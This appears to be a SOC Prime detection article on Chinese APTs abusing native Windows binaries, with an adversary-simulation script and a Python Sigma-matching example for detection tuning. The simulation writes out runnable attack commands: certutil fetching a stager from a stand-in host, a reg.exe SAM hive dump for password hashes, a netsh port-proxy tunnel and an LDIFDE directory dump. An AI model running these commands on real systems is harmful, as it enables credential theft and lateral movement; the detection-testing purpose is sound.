SOC Prime Bias: Critical

18 May 2026 18:20 UTC

Hunting Chinese APTs Abusing Native Windows Tools

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The article explores how Chinese advanced persistent threat groups abuse built-in Windows utilities, often referred to as LOLBAS, to perform reconnaissance, steal credentials, and move laterally across environments while blending into routine administrative activity.

Investigation

It highlights specific command-line use of native tools such as nltest, certutil, netsh, reg.exe, vssadmin, and others, and points to Sigma rules that can help detect these techniques within SIEM platforms.

Mitigation

Defenders are encouraged to monitor suspicious execution of native Windows binaries, enforce least-privilege access controls, audit registry modifications, and deploy detection logic based on the referenced Sigma patterns.

Response

When suspicious LOLBAS activity is identified, security teams should trigger an alert, isolate the affected host, collect relevant logs, confirm whether credential dumping or lateral movement occurred, and perform forensic analysis on any resulting artifacts.

Attack Flow

We are still updating this part.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    An attacker who has gained an initial foothold on a domain‑joined Windows workstation seeks to map the domain, enumerate privileged groups, and harvest credential material using only native binaries, so as to avoid triggering traditional AV signatures. The steps are:

    1. Enumerate Domain Controllers: nltest /dclist:domain.local – reveals all DCs in the target domain.
    2. Collect System Information: systeminfo – gathers OS version, patches, and hardware details.
    3. List Running Processes: tasklist – provides insight into privileged services.
    4. Query Windows Event Logs for Logon Events: Get-EventLog -LogName Security -InstanceId 4624 (PowerShell) – extracts successful logon events.
    5. Download a staged payload: certutil -urlcache -split -f https://example.com/stager.exe C:\Windows\Temp\stager.exe – uses certutil to bypass web‑filtering.
    6. Enumerate Local Administrators: net localgroup administrators – identifies privileged accounts.
    7. Export SAM Registry Hive: reg.exe save hklm\sam C:\sam.save – attempts to dump password hashes.
    8. Create Port Proxy for Lateral Movement: netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 – prepares a tunnel.
    9. Enumerate DNS Records: dnscmd . /enumrecords /zone – discovers internal DNS zones.
    10. Export AD objects via LDIFDE: ldifde.exe -f C:\Windows\Temp\ad_dump.txt -p subtree – pulls directory data.
    11. Create a Volume Shadow Copy: vssadmin create shadow /for=C: – enables file‑level access to locked files.

    Each command exactly matches one of the “CommandLine|contains” strings in the Sigma rule, ensuring the rule fires on the resulting process‑creation events.

  • Regression Test Script: (PowerShell – self‑contained, requires admin rights)

    # TC-20260518-A7B9K – Simulate adversary usage of native Windows utilities
    # NOTE: Run on a domain‑joined Windows host with admin privileges.
    
    # 1. Domain controller enumeration
    nltest /dclist:domain.local
    
    # 2. System information
    systeminfo
    
    # 3. List processes
    tasklist
    
    # 4. Security event log extraction (PowerShell)
    Get-EventLog -LogName security -InstanceId 4624
    
    # 5. Download staged payload via certutil
    certutil -urlcache -split -f https://example.com/stager.exe C:\Windows\Temp\stager.exe
    
    # 6. Enumerate local administrators
    net localgroup administrators
    
    # 7. Export SAM hive
    reg.exe save hklm\sam C:\sam.save
    
    # 8. Configure port proxy
    netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389
    
    # 9. DNS zone enumeration
    dnscmd . /enumrecords /zone
    
    # 10. Export AD data via LDIFDE
    ldifde.exe -f C:\Windows\Temp\ad_dump.txt -p subtree
    
    # 11. Create a volume shadow copy
    vssadmin create shadow /for=C:

  • Cleanup Commands:

    # Remove files created during the simulation
    Remove-Item -Path C:\Windows\Temp\stager.exe -ErrorAction SilentlyContinue
    Remove-Item -Path C:\sam.save -ErrorAction SilentlyContinue
    Remove-Item -Path C:\Windows\Temp\ad_dump.txt -ErrorAction SilentlyContinue
    
    # Delete the portproxy rule
    netsh interface portproxy delete v4tov4 listenport=4444
    
    # Delete the shadow copy (optional). Note that /all removes every shadow copy on C:,
    # including pre-existing ones; to remove only the copy created above, look up its ID
    # with 'vssadmin list shadows' and use 'vssadmin delete shadows /shadow=<ID> /quiet'.
    # vssadmin delete shadows /for=C: /all /quiet
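The narrative above notes that each simulated command is meant to hit one of the “CommandLine|contains” strings in the Sigma rule. The following is an added example, not code from the SOC Prime page or from the referenced Sigma rule: a minimal re-implementation of Sigma's case-insensitive `contains` matching run over constructed process-creation events, plus a per-host correlation step that a SOC would want, because several of these binaries (systeminfo, tasklist, net) are routine in benign administration and fire on their own. The selector substrings are an assumption derived from the page's command list, not the rule's actual strings; the event records, host names and user names are constructed.

```python
"""Added example: Sigma-style 'CommandLine|contains' matching over constructed
process-creation events, with per-host correlation to suppress single-tool noise.
Not from the SOC Prime page; selectors are assumed from the page's command list."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: substrings approximating the rule's CommandLine|contains list,
# taken from the commands listed on the page. Sigma 'contains' is case-insensitive.
COMMANDLINE_CONTAINS = [
    "nltest /dclist",
    "systeminfo",
    "tasklist",
    "-InstanceId 4624",
    "certutil -urlcache -split -f",
    "net localgroup administrators",
    "reg.exe save hklm\\sam",
    "netsh interface portproxy add",
    "dnscmd . /enumrecords",
    "ldifde.exe -f",
    "vssadmin create shadow",
]

# Constructed sample events in the shape of Sysmon Event ID 1 / Security 4688 records.
SAMPLE_EVENTS = [
    {"ts": "2026-05-18T18:20:01", "host": "WS-017", "user": "CORP\\jdoe",
     "CommandLine": "nltest /dclist:domain.local"},
    {"ts": "2026-05-18T18:20:09", "host": "WS-017", "user": "CORP\\jdoe",
     "CommandLine": "systeminfo"},
    {"ts": "2026-05-18T18:20:20", "host": "WS-017", "user": "CORP\\jdoe",
     "CommandLine": "reg.exe save hklm\\sam C:\\sam.save"},
    {"ts": "2026-05-18T18:20:41", "host": "WS-017", "user": "CORP\\jdoe",
     "CommandLine": "netsh interface portproxy add v4tov4 listenport=4444 "
                    "connectaddress=10.0.0.5 connectport=3389"},
    # Benign helpdesk activity: a lone systeminfo on another host.
    {"ts": "2026-05-18T18:25:00", "host": "WS-042", "user": "CORP\\helpdesk",
     "CommandLine": "systeminfo"},
    # Unrelated process that must not match.
    {"ts": "2026-05-18T18:26:00", "host": "WS-042", "user": "CORP\\helpdesk",
     "CommandLine": "notepad.exe C:\\notes.txt"},
]


def sigma_contains_match(event, selectors=COMMANDLINE_CONTAINS):
    """Return the first selector contained in the event's CommandLine, or None.
    Mirrors Sigma's 'contains' modifier: case-insensitive substring test."""
    cmd = event.get("CommandLine", "").lower()
    for selector in selectors:
        if selector.lower() in cmd:
            return selector
    return None


def match_events(events):
    """Per-event detections: (host, timestamp, selector) for every hit.
    This is what the raw rule produces, including the benign WS-042 systeminfo."""
    results = []
    for event in events:
        selector = sigma_contains_match(event)
        if selector:
            results.append((event["host"], event["ts"], selector))
    return results


def correlate_by_host(events, min_distinct=3, window=timedelta(minutes=10)):
    """Flag a host only when at least `min_distinct` different selectors fire
    within `window`; returns {host: sorted distinct selectors in the window}."""
    hits = defaultdict(list)
    for event in events:
        selector = sigma_contains_match(event)
        if selector:
            hits[event["host"]].append((datetime.fromisoformat(event["ts"]), selector))
    flagged = {}
    for host, items in hits.items():
        items.sort()
        for i, (t0, _) in enumerate(items):
            distinct = {sel for t, sel in items[i:] if t - t0 <= window}
            if len(distinct) >= min_distinct:
                flagged[host] = sorted(distinct)
                break
    return flagged


if __name__ == "__main__":
    for hit in match_events(SAMPLE_EVENTS):
        print("rule hit:", hit)
    print("hosts flagged after correlation:", correlate_by_host(SAMPLE_EVENTS))
```

Running this prints five raw rule hits (four on WS-017, one benign systeminfo on WS-042) but only WS-017 survives the correlation step, which is the behaviour to aim for when tuning the rule in a SIEM. Two practical caveats when feeding real telemetry into this logic: Security event 4688 carries the command line only when the "Include command line in process creation events" audit policy is enabled (otherwise the CommandLine field is empty and nothing matches), and the correlation threshold and window should be set from a baseline of the environment's own administrative activity rather than the values used here.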